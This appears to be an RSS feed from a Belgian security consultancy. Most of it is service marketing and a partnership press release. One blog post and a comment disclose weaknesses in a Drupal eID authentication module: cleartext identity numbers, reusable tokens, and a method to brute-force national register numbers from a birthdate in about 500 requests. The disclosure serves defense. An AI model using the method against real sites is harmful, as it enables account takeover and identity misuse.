<p>This is better then 9999 so using Burp Intruder with 10 threads/second should take less then a minute to find the valid RRN when we know somebody his birthdate.</p>]]></description><content:encoded><![CDATA[ <p>We got some reactions concerning the Rijksregisternumber used by the eID module.</p>
<p>The five random numbers are not all five random. The last two are a checksum for the entire number, using a DIV 97. The first three are even numbers for male citizens, and odd numbers for female citizens.</p>
<p>So this means that we can brute-force a Rijksregisternumber in 500 or 499 attempts.</p>
<p>This is better then 9999 so using Burp Intruder with 10 threads/second should take less then a minute to find the valid RRN when we know somebody his birthdate.</p>]]></content:encoded></item><item><title>comment by Johan</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-johan.aspx</link><pubDate>2010-03-02T11:45:28</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-johan.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Geert</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-geert.aspx</link><pubDate>2010-03-02T11:33:07</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-geert.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Meet ZION SECURITY at Infosecurity 2010</title><link>http://www.zionsecurity.com/news/meet-zion-security-at-infosecurity-2010.aspx</link><pubDate>2010-03-01T10:24:17</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/meet-zion-security-at-infosecurity-2010.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>ZION SECURITY celebrates 5 year anniversary</title><link>http://www.zionsecurity.com/news/zion-security-celebrates-5-year-anniversary.aspx</link><pubDate>2010-03-01T10:04:38</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/zion-security-celebrates-5-year-anniversary.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Improving your web applications security</title><link>http://www.zionsecurity.com/university/improving-your-web-applications-security.aspx</link><pubDate>2010-03-01T09:50:41</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/university/improving-your-web-applications-security.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Unsecure implementation of eID authentication in Drupal</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal.aspx</link><pubDate>2010-02-26T15:59:15</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal.aspx</guid><description><![CDATA[ <p>A few weeks ago I saw a tweet by Dries Buytaert, the creator of Drupal, that a Belgian web agency created a module for Drupal to allow authentication with the Belgian electronic identity card (eID). I am a supporter of Drupal and the eID card since years.</p>
<p>ZION SECURITY wrote a whitepaper about implementing a secure authentication framework for the eID, see http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx.</p>
<p>Because it is Drupal, the module is open-source so we took a look at the implementation and to my big surprise, the implementation fails terribly at securing the authentication process.</p>
<p>Testing this in our lab was impossible because the quality of the module is unsatisfying and I don't want to waste time fixing somebody else mistakes. However, it was for me required to blog about the unsecurity of this module before somebody uses it for a production environment. Contacting this web agency resulted in nothing constructive so this is also an eye-opener for them!</p>
<p>What is the problem? There are different problems.</p>
<p>1. They use the serialnumber of the certificate, which is the Rijksregisternummer (SSN) of a Belgian citizen. The usage of this SSN is <strong>prohibited</strong> by the Belgian Privacy Commission but they use it as a primary key in the Drupal user database (fail!)</p>
<p>2. To authenticate the user, they use a proxy server that will validate the eID certificate and retrieve the values like firstname, lastname and serialnumber. These parameters are then sent to the Drupal site using HTTP in <strong>clear text</strong>! No protection of the SSN is provided in any way, for example: http//drupalsite/eid/response?firstname=Erwin+Andr%C3%A9&amp;lastname=Geirnaert&amp;serialnr=CENSORED &amp;token=0f2e01a6bedb2dee2df2bde2c05f68c8</p>
<p>3. The token that you notice in the URL above is generated by the Drupal site! This token is visible for the user and can be <strong>copied and re-used</strong>, in my Drupal site this was /eid.php?token=0f2e01a6bedb2dee2df2bde2c05f68c8&amp;login=CENSORED</p>
<p>4. To make things worse, if we combine the previous information we can logon to any web site that uses this module when we know the SSN number. We don't need the eID, the PIN code or the certificate, only the SSN. How do you get the SSN? The SSN is a string of 11 numbers, where the first 6 are the birthdate of the user and the last 5 are random. So if I know somebody his birthday (LinkedIn, Plaxo, Facebook anyone?) I can brute-force his SSN in 9999 requests to gain access to the Drupal site. <strong>These attempts are not detected, blocked or logged!</strong></p>
<p><strong>5. All connections to the Drupal web site are not using HTTPS so it is possible to sniff the user his cookie! </strong>Now that is possible to use SSL with client certificates thanks to the Belgian government, unbelievable!<strong><br /></strong></p>
<p>Typing this makes me somewhat angry. Initiatives like OWASP, SANS Secure Coding, ... are useless when people don't want to write secure code and forget about the impact of security bugs and even refuse help from people like us!</p>]]></description><content:encoded><![CDATA[ <p>A few weeks ago I saw a tweet by Dries Buytaert, the creator of Drupal, that a Belgian web agency created a module for Drupal to allow authentication with the Belgian electronic identity card (eID). I am a supporter of Drupal and the eID card since years.</p>
<p>ZION SECURITY wrote a whitepaper about implementing a secure authentication framework for the eID, see http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx.</p>
<p>Because it is Drupal, the module is open-source so we took a look at the implementation and to my big surprise, the implementation fails terribly at securing the authentication process.</p>
<p>Testing this in our lab was impossible because the quality of the module is unsatisfying and I don't want to waste time fixing somebody else mistakes. However, it was for me required to blog about the unsecurity of this module before somebody uses it for a production environment. Contacting this web agency resulted in nothing constructive so this is also an eye-opener for them!</p>
<p>What is the problem? There are different problems.</p>
<p>1. They use the serialnumber of the certificate, which is the Rijksregisternummer (SSN) of a Belgian citizen. The usage of this SSN is <strong>prohibited</strong> by the Belgian Privacy Commission but they use it as a primary key in the Drupal user database (fail!)</p>
<p>2. To authenticate the user, they use a proxy server that will validate the eID certificate and retrieve the values like firstname, lastname and serialnumber. These parameters are then sent to the Drupal site using HTTP in <strong>clear text</strong>! No protection of the SSN is provided in any way, for example: http//drupalsite/eid/response?firstname=Erwin+Andr%C3%A9&amp;lastname=Geirnaert&amp;serialnr=CENSORED &amp;token=0f2e01a6bedb2dee2df2bde2c05f68c8</p>
<p>3. The token that you notice in the URL above is generated by the Drupal site! This token is visible for the user and can be <strong>copied and re-used</strong>, in my Drupal site this was /eid.php?token=0f2e01a6bedb2dee2df2bde2c05f68c8&amp;login=CENSORED</p>
<p>4. To make things worse, if we combine the previous information we can logon to any web site that uses this module when we know the SSN number. We don't need the eID, the PIN code or the certificate, only the SSN. How do you get the SSN? The SSN is a string of 11 numbers, where the first 6 are the birthdate of the user and the last 5 are random. So if I know somebody his birthday (LinkedIn, Plaxo, Facebook anyone?) I can brute-force his SSN in 9999 requests to gain access to the Drupal site. <strong>These attempts are not detected, blocked or logged!</strong></p>
<p><strong>5. All connections to the Drupal web site are not using HTTPS so it is possible to sniff the user his cookie! </strong>Now that is possible to use SSL with client certificates thanks to the Belgian government, unbelievable!<strong><br /></strong></p>
<p>Typing this makes me somewhat angry. Initiatives like OWASP, SANS Secure Coding, ... are useless when people don't want to write secure code and forget about the impact of security bugs and even refuse help from people like us!</p>]]></content:encoded></item><item><title>Blog</title><link>http://www.zionsecurity.com/blog.aspx</link><pubDate>2010-02-15T10:54:32</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Introduction to WAF</title><link>http://www.zionsecurity.com/university/introduction-to-waf.aspx</link><pubDate>2009-12-16T10:24:11</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/university/introduction-to-waf.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Malware Monitoring</title><link>http://www.zionsecurity.com/solutions/web-anti-malware/malware-monitoring.aspx</link><pubDate>2009-11-02T15:31:51</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-anti-malware/malware-monitoring.aspx</guid><description><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Malware Monitoring</span></p>
<p class="contenttext">Our&nbsp;Web Anti-Malware (WAM) Malware Monitoring periodically scans your website for malware infections. If&nbsp;we detect that your website has been infected,&nbsp;you will&nbsp;receive an immediate alert with diagnostic information to remove the infection.</p>
<p class="contenttext">Armed with the diagnostic information, the customer (or its web hosting provider) can remove the malicious code, in many cases before the site would get blacklisted.</p>
<p class="contenttext">As a result, the site can continue to operate as normal and avoid getting blacklisted, even after suffering a malware attack.&nbsp;We continue to monitor the site and send alerts if malware activity is detected in the future.</p>
<p class="contenttext">For example&nbsp;Javascript viruses will be immediately detected and&nbsp;escalated to the customer&nbsp;to prevent&nbsp;that visitors of the customer's&nbsp;web site&nbsp;are infected.</p>
<p class="contenttext">Your Key Benefits:</p>
<ul class="agenda">
<li>Avoid getting blacklisted (and avoid revenue and brand losses) with regular scans of your site</li>
<li>Instant alerts of malware activity on your site (most often before blacklisting occurs)</li>
<li>Actionable information to resolve the malware problem quickly and avoid getting blacklisted</li>
<li>Detailed weekly malware scanning reports</li>
</ul>
<p class="contenttext"><a href="/dasient.aspx">Sign up </a>for the Web Anti-Malware Monitoring now by entering your domain name.</p>
<p class="contenttext"><a href="/protected/ZION VERIFIED Web Anti-Malware.pdf">Download</a> the PDF for more general information.</p>
<p class="contenttext"><a href="/protected/Why-How Malware Attacks Occur.pdf">Download</a> the PDF about how malware attacks occur.</p>
<p class="contenttext"><a href="/protected/Malware Hurts Web Business.pdf">Download</a> the PDF about malware hurts web business.</p>]]></description><content:encoded><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Malware Monitoring</span></p>
<p class="contenttext">Our&nbsp;Web Anti-Malware (WAM) Malware Monitoring periodically scans your website for malware infections. If&nbsp;we detect that your website has been infected,&nbsp;you will&nbsp;receive an immediate alert with diagnostic information to remove the infection.</p>
<p class="contenttext">Armed with the diagnostic information, the customer (or its web hosting provider) can remove the malicious code, in many cases before the site would get blacklisted.</p>
<p class="contenttext">As a result, the site can continue to operate as normal and avoid getting blacklisted, even after suffering a malware attack.&nbsp;We continue to monitor the site and send alerts if malware activity is detected in the future.</p>
<p class="contenttext">For example&nbsp;Javascript viruses will be immediately detected and&nbsp;escalated to the customer&nbsp;to prevent&nbsp;that visitors of the customer's&nbsp;web site&nbsp;are infected.</p>
<p class="contenttext">Your Key Benefits:</p>
<ul class="agenda">
<li>Avoid getting blacklisted (and avoid revenue and brand losses) with regular scans of your site</li>
<li>Instant alerts of malware activity on your site (most often before blacklisting occurs)</li>
<li>Actionable information to resolve the malware problem quickly and avoid getting blacklisted</li>
<li>Detailed weekly malware scanning reports</li>
</ul>
<p class="contenttext"><a href="/dasient.aspx">Sign up </a>for the Web Anti-Malware Monitoring now by entering your domain name.</p>
<p class="contenttext"><a href="/protected/ZION VERIFIED Web Anti-Malware.pdf">Download</a> the PDF for more general information.</p>
<p class="contenttext"><a href="/protected/Why-How Malware Attacks Occur.pdf">Download</a> the PDF about how malware attacks occur.</p>
<p class="contenttext"><a href="/protected/Malware Hurts Web Business.pdf">Download</a> the PDF about malware hurts web business.</p>]]></content:encoded></item><item><title>Blacklist Monitoring</title><link>http://www.zionsecurity.com/solutions/web-anti-malware/blacklist-monitoring.aspx</link><pubDate>2009-11-02T15:30:49</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-anti-malware/blacklist-monitoring.aspx</guid><description><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Blacklist Monitoring</span></p>
<p class="contenttext">If a site has been infected with malware, there is a good chance the site will get blacklisted by Google, Firefox, Internet Explorer, and/or the desktop anti-virus companies. If this happens, the website will suffer losses of traffic, revenue and brand.</p>
<p class="contenttext">Often, sites first discover that they have been blacklisted when a customer notifies them of the blacklisting.&nbsp;We provide an alert service to help websites react quickly if their site has been blacklisted.</p>
<p class="contenttext">The Web Anti-Malware (WAM) Blacklist Monitoring frequently checks your website against a variety of blacklists. If the website appears on a blacklist, you receive an instant alert. You can subsequently return to our experts and diagnose any problems with the blacklisted site.</p>
<p class="contenttext">Your Key Benefits:</p>
<ul class="agenda">
<li>Minimize losses by reacting quickly if your website is blacklisted</li>
<li>Checks your website regularly against a variety of important blacklists including Google, Firefox, Chrome, and others</li>
<li>Get an instant alert if your site is blacklisted</li>
<li>Weekly blacklist report</li>
</ul>
<p class="contenttext"><a href="/dasient.aspx">Sign up </a>for the Web Anti-Malware Blacklist Monitoring FOR FREE by entering your domain name.</p>
<p class="contenttext"><a href="/protected/ZION VERIFIED Web Anti-Malware.pdf">Download</a> the PDF for more general information.</p>
<p class="contenttext"><a href="/protected/Why-How Malware Attacks Occur.pdf">Download</a> the PDF about how malware attacks occur.</p>
<p class="contenttext"><a href="/protected/Malware Hurts Web Business.pdf">Download</a> the PDF about malware hurts web business.</p>]]></description><content:encoded><![CDATA[ <div style="float:right;">
<table border="0" class="dasientform" style="width: 200px;">
<tbody>
<tr>
<td>Enter your website!</td>
</tr>
<tr>
<td>
<?UMBRACO_MACRO macroAlias="DasientControlForm" />
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;<span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Blacklist Monitoring</span></p>
<p class="contenttext">If a site has been infected with malware, there is a good chance the site will get blacklisted by Google, Firefox, Internet Explorer, and/or the desktop anti-virus companies. If this happens, the website will suffer losses of traffic, revenue and brand.</p>
<p class="contenttext">Often, sites first discover that they have been blacklisted when a customer notifies them of the blacklisting.&nbsp;We provide an alert service to help websites react quickly if their site has been blacklisted.</p>
<p class="contenttext">The Web Anti-Malware (WAM) Blacklist Monitoring frequently checks your website against a variety of blacklists. If the website appears on a blacklist, you receive an instant alert. You can subsequently return to our experts and diagnose any problems with the blacklisted site.</p>
<p class="contenttext">Your Key Benefits:</p>
<ul class="agenda">
<li>Minimize losses by reacting quickly if your website is blacklisted</li>
<li>Checks your website regularly against a variety of important blacklists including Google, Firefox, Chrome, and others</li>
<li>Get an instant alert if your site is blacklisted</li>
<li>Weekly blacklist report</li>
</ul>
<p class="contenttext"><a href="/dasient.aspx">Sign up </a>for the Web Anti-Malware Blacklist Monitoring FOR FREE by entering your domain name.</p>
<p class="contenttext"><a href="/protected/ZION VERIFIED Web Anti-Malware.pdf">Download</a> the PDF for more general information.</p>
<p class="contenttext"><a href="/protected/Why-How Malware Attacks Occur.pdf">Download</a> the PDF about how malware attacks occur.</p>
<p class="contenttext"><a href="/protected/Malware Hurts Web Business.pdf">Download</a> the PDF about malware hurts web business.</p>]]></content:encoded></item><item><title>Scansafe</title><link>http://www.zionsecurity.com/partners/scansafe.aspx</link><pubDate>2009-10-07T09:35:52</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/scansafe.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_179x54.jpg"  width="179"  height="54" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About Scansafe</span></p>
<p class="contenttext">Scansafe is the pioneer and largest global provider of SaaS Web Security, ensuring a safe and productive environment for businesses. Scansafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web.</p>
<p class="contenttext">Scansafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY makes use of Scansafe to protect each individual user against external threats.</p>
<p class="contenttext"><a href="/solutions/web-security/web-filtering.aspx" target="_blank">Scansafe Web Filtering </a>enables businesses to implement granular control for both inbound and outbound communications. For example integrated outbound policy helps prevent leaks of confidential or personal data to the Web. Scansafe Web Filtering protects your network and staff from undesirable Web content, drives productivity, optimizes network resources by reducing bandwidth congestion and provides comprehensive reporting.</p>
<p class="contenttext"><a href="/solutions/web-security/web-malware-scanning.aspx" target="_blank">Scansafe Web Security </a>analyzes every Web request to determine if content is malicious, inappropriate or acceptable based on the defined security policy. This offers effective protection against threats including zero-day threats that would otherwise be succesful.</p>
<p class="contenttext"><a href="/solutions/web-security/anywhere-plus.aspx" target="_blank">Scansafe Anywhere+</a> protects remote workers to the same level, whether they are working from home, from a hotel or even from a coffee shop. Anywhere+ automatically redirects users to the closest datacenter, ensuring that performance is always optimized.</p>
<p class="contenttext">For more information click <a href="/solutions/web-security.aspx" target="_blank">here</a> or visit <a href="http://www.scansafe.com">www.scansafe.com</a>.</p>
<p>&nbsp;</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/media/22252/logo_jpg_small_179x54.jpg"  width="179"  height="54" alt="Scansafe logo" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About Scansafe</span></p>
<p class="contenttext">Scansafe is the pioneer and largest global provider of SaaS Web Security, ensuring a safe and productive environment for businesses. Scansafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web.</p>
<p class="contenttext">Scansafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY makes use of Scansafe to protect each individual user against external threats.</p>
<p class="contenttext"><a href="/solutions/web-security/web-filtering.aspx" target="_blank">Scansafe Web Filtering </a>enables businesses to implement granular control for both inbound and outbound communications. For example integrated outbound policy helps prevent leaks of confidential or personal data to the Web. Scansafe Web Filtering protects your network and staff from undesirable Web content, drives productivity, optimizes network resources by reducing bandwidth congestion and provides comprehensive reporting.</p>
<p class="contenttext"><a href="/solutions/web-security/web-malware-scanning.aspx" target="_blank">Scansafe Web Security </a>analyzes every Web request to determine if content is malicious, inappropriate or acceptable based on the defined security policy. This offers effective protection against threats including zero-day threats that would otherwise be succesful.</p>
<p class="contenttext"><a href="/solutions/web-security/anywhere-plus.aspx" target="_blank">Scansafe Anywhere+</a> protects remote workers to the same level, whether they are working from home, from a hotel or even from a coffee shop. Anywhere+ automatically redirects users to the closest datacenter, ensuring that performance is always optimized.</p>
<p class="contenttext">For more information click <a href="/solutions/web-security.aspx" target="_blank">here</a> or visit <a href="http://www.scansafe.com">www.scansafe.com</a>.</p>
<p>&nbsp;</p>]]></content:encoded></item><item><title>Nascom</title><link>http://www.zionsecurity.com/partners/nascom.aspx</link><pubDate>2009-09-29T15:55:52</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/nascom.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Nascom &amp; ZI<strong class="red">O</strong>N SECURITY start up unique partnership</span></p>
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="text-align:center;">
<p style="color:#5a5b5b;font-size:11px;font-family:Arial;">&nbsp;</p>
</td>
</tr>
<tr>
<td valign="top"><img src="http://www.nascom.be/nascommailing/zion/img/mail-head.gif" width="550" height="57" alt="nascom" style="border:0;"/></td>
</tr>
<tr>
<td valign="top" bgcolor="#f3f3f3">
<p style="margin-top:15px;margin-bottom:15px;margin-left:20px;color:#dc2127"><a name="top"></a><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#english" title="English">English</a> | <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#nederlands" title="Nederlands">Nederlands</a> | <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="/partners/nascom/partnership.aspx#frans" title="Fran&ccedil;ais">Fran&ccedil;ais</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="english"></a>English</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-en.gif" width="516" height="64" alt="Nascom and ZION SECURITY start up unique partnership " style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h3>Hasselt / Leuven 17 September 2009</h3>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>An online application developer and an expert in security solutions are joining forces to offer a full service to their customers.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Security issues are typically tackled at the moment a &lsquo;hack&rsquo; has been determined, and the company is confronted with an acute problem. In the best-case scenario, an application is tested on possible security risks after its delivery.</p>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom and ZION SECURITY prefer to adopt a proactive way of handling this. They are introducing security right from the start of the project, and can therefore avoid many unnecessary costs and hassles.</p>
</td>
<td valign="top" style="margin: 0pt; padding: 0pt; width: 294px; text-align: right;"><br /> <img src="http://www.nascom.be/nascommailing/zion/img/zion_nascom.gif" width="252" height="310" alt="Nascom and ZION SECURITY start up unique partnership" style="border:0;padding:0;margin:0;margin-top:63px"/> <br /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<h4>Perfect partners</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Applications must be secure, always. That is the starting point of this partnership. Nascom takes care of building the applications and puts the security related issues of delivering (web) applications in the professional hands of a third and independent party. Leuven-based ZION SECURITY proved to be a perfect partner.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">ZION SECURITY stays closely involved with the project throughout the entire process to nip security issues in the bud, resulting in 100% secure applications at the time of delivery to the customer.</p>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" style="width: 550px; border-collapse: collapse; margin-bottom: 15px;">
<tbody>
<tr>
<td width="296" valign="top">
<h4>Investing in knowledge</h4>
<p style="margin-left:20px;margin-right:20px;margin-bottom:0;color:#5a5b5b;font-size:11px;font-family:Arial;">From now on Nascom will include ZION SECURITY services in its offerings to clients, including risk analysis and thorough testing. The customer has the option to get consultancy and the brand new service &lsquo;ZION VERIFIED&rsquo;, a solution that helps protect the application after development against external threats.</p>
</td>
<td width="254" valign="middle">
<p style="padding:0;margin:0;text-align:right;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-knowledge-invest.gif" width="225" height="55" alt="Applications must be secure, always&rsquo;" style="margin:0 20px 0 0;padding:0;border:0;"/></p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Investing in knowledge is essential to achieve the common goal that has been set. Nascom employees have been thoroughly trained by ZION SECURITY specialists, to guarantee the right know-how and expertise.</p>
<p style="margin-left:20px;margin-right:20px;margin-bottom:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">As the first developer of online applications in Belgium, Nascom is implementing a &lsquo;Secure Development Life cycle&rsquo; (SDL), and integrating security related knowledge and effort in her standard SDL. This entails among other things that ZION SECURITY will execute a code review as well as testing as a standard for every application that requires it.</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Avoid traps</h4>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">ZION SECURITY will in turn recommend Nascom as a strategic partner for &lsquo;secure web development&rsquo; with its customers. They have faith in the level of expertise at Nascom and know that their way of programming and the implementation of the SDL will lead to secure applications.</p>
<p style="margin:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin:0 0 15px 20px;">Thanks to this new approach, typical security related traps can be avoided, since they are tackled right from the start of the project. The customer can count on a secure application at the end of the production process.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:20px;margin-right:0;margin-bottom:15px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-more-info.gif" width="64" height="10" alt="More info:" style="border:0"/></p>
<h3>Nascom</h3>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Jonas Coenen (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:jonas.coenen@nascom.be" title="mail to jonas.coenen@nascom.be">jonas.coenen@nascom.be</a>)<br /> t: +32 89 20 15 00<br /> f: +32 89 20 15 01</p>
<h4>ZION SECURITY</h4>
<p style="margin-top:0;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Christophe Joos (Sales &amp; Account Manager) (<a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="mailto:christophe.joos@zionsecurity.com" title="mail to christophe.joos@zionsecurity.com">christophe.joos@zionsecurity.com</a>)<br /> m: +32 495/83 51 31<br /> t: +32 16/29 79 22</p>
</td>
</tr>
<tr>
<td valign="top">
<h4>Who is Nascom?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Nascom is a young and dynamic agency specialized in 4 interactive fields: Digital Campaigns, Digital Applications, Mobile and Services. Nascom employs over 70 enthusiastic creative and skilled individuals.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:20px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Want to know more? Visit <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.nascom.be" title="Wie is Nascom">www.nascom.be</a></p>
<h4>Who is ZION SECURITY?</h4>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">The Leuven-based ZION SECURITY was founded in 2005 by Ir. Erwin Geirnaert and Jessica Nieuwdorp. Its consultants are experts in IT and security and have years of experience in executing projects for large, medium and small enterprises. They are specialized in securing business and e-business applications, e-commerce shops and network infrastructure.</p>
<p style="margin-top:0;margin-right:0;margin-bottom:10px;margin-left:20px;color:#5a5b5b;font-size:11px;font-family:Arial;">Want to know more? Visit <a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="http://www.zionsecurity.com" title="Who is ZION SECURITY?">www.zionsecurity.com</a>.</p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin:10px 0 10px 20px;"><a style="text-decoration:underline;color:#dc2127;font-size:11px;font-family:Arial;" href="#top" title="Top">Top</a></p>
</td>
</tr>
<tr>
<td valign="top">
<p style="margin-top:25px;margin-left:20px;margin-bottom:5px;color:#5a5b5b;font-size:11px;font-family:Arial"><a name="nederlands"></a>Nederlands</p>
</td>
</tr>
<tr>
<td valign="top" style="margin-top:5px;margin-left:20px;"><img src="http://www.nascom.be/nascommailing/zion/img/mail-title-nl.gif" width="516" height="64" alt="Nascom and ZION SECURITY start up unique partnership " style="border:0;padding:0;margin:0 0 0 20px;"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="550" style="border-collapse:collapse;">
<tbody>
<tr>
<td valign="top" style="margin: 0pt; padding: 25px 0px 35px 20px; width: 236px; height: 310px;">
<h1>Hasselt / Leuven 17 september 2009</h1>
<p style="margin-bottom:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;margin-bottom:25px;"><strong>Voor het eerst steken een ontwikkelaar van online toepassingen en een expert in security oplossingen de koppen bij mekaar om de klant een volledige service aan te bieden.</strong></p>
<img src="http://www.nascom.be/nascommailing/zion/img/mail-quote-intro-en.gif" width="169" height="54" alt="Better safe than sorry" style="padding:0;border:0;margin-left:25px"/>
<p style="margin-top:20px;padding:0;color:#5a5b5b;font-size:11px;font-family:Arial;">Vaak worden veiligheidsproblemen in applicaties pas aangepakt op het moment dat een &lsquo;hack&rsquo; wordt vastgesteld, en er een accuut probleem is. Of wordt er in het beste geval na projectoplevering getest op mogelijke veiligheidsrisico&rsquo;s.</p>
